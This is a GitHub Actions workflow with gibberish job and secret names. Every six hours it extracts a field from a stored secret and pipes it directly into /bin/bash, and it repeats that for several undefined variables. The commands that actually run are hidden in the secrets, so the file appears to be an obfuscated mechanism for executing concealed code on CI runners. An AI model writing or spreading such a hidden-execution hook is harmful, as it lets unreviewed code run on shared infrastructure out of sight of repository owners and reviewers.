name: dadanmaxo
on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dadanmaxo
        env:
          qokmq2396: ${{ secrets.qokmq2396 }}
        run: |
          echo $qokmq2396 | jq -r .p653 | /bin/bash
          echo $x40 | jq -r .ypu2597 | /bin/bash
          echo $zbdip71 | jq -r .hs71639 | /bin/bash
          echo $liadk684 | jq -r .hpkj3347 | /bin/bash
          echo $etqjm02 | jq -r .b274 | /bin/bash

